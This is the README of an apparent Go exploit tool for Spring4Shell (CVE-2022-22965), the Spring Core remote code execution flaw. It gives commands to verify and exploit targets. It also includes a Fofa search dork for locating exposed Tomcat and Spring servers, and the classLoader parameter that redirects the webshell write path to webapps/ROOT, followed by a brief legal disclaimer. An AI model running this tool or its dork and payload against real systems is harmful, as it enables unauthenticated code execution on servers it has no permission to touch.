Spring4Shell (CVE-2022-22965)# CVE-2022-22965
Spring4Shell (CVE-2022-22965)
## Usage
### 1. show info
```bash
❯ go run main.go -s
[INF] VulnInfo:
{
"Name": "CVE-2022-22965",
"VulID": "nil",
"Version": "1.0",
"Author": "",
"VulDate": "2022-03-30",
"References": [
"https://nosec.org/home/detail/4983.html"
],
"AppName": "Spring Core",
"AppPowerLink": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement",
"AppVersion": "All",
"VulType": "RCE",
"Description": "An unauthenticated attacker can use this vulnerability to perform remote arbitrary code execution. The vulnerability is widespread in the Spring framework and derived frameworks, and JDK 9.0 and above are affected.",
"Category": "REMOTE",
"Dork": {
"Fofa": "app=\"APACHE-Tomcat\" || app=\"vmware-SpringBoot-framework\" || app=\"vmware-SpringBoot-framework\" || app=\"vmware-Spring-Batch\" || app=\"vmware-Spring-framework\" || app=\"vmware-Spring-Security\"",
"Quake": "",
"Zoomeye": "",
"Shodan": ""
}
}%
```
### 2. verify
```bash
echo http://127.0.0.1:8181/ | go run main.go -v -t 20
http://127.0.0.1:8181/
```
### 3. exploit
```bash
echo http://127.0.0.1:8181/ | go run main.go -m exploit -v
```
Maybe require changing the file upload path, which by default is "webapps/ROOT"
```
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT/
```
## Disclaimer
This procedure is for security self-inspection only, please consciously comply with local laws.登录后查看神龙缓存的 POC 文件快照
登录查看